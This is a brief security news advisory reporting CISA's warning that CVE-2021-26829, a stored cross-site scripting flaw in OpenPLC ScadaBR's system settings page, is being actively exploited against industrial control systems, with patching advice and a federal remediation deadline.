CISA reports active exploitation of Cross-Site Scripting flaw in OpenPLC ScadaBR
Take action: If you are running unpatched OpenPLC ScadaBR, make sure it is isolated from the internet and accessible from trusted networks only. Then plan a very quick patch, since it's a 4-year-old flaw and you still haven't gotten around to patching it. And now it's actively exploited.
Learn More
CISA reports that a vulnerability in OpenPLC ScadaBR is actively exploited by threat actors targeting industrial control systems.
The flaw is tracked as CVE-2021-26829 (CVSS score 5.4), a stored Cross-Site Scripting (XSS) vulnerability in the system_settings.shtm component of ScadaBR. The vulnerability was initially disclosed 4 years ago, there are instances of unpatched systems. The vulnerability enables remote attackers to inject malicious web scripts or HTML code through the system settings interface. The code executes when administrators or authenticated users access the compromised page.
Successful exploitation could enable attackers to hijack authenticated user sessions, steal credentials, or manipulate configuration settings within the affected SCADA infrastructure.
Security teams and network administrators are strongly urged to patch the vulnerable ScadaBR component.
CISA has mandated that Federal Civilian Executive Branch (FCEB) agencies remediate CVE-2021-26829 by December 19, 2025.
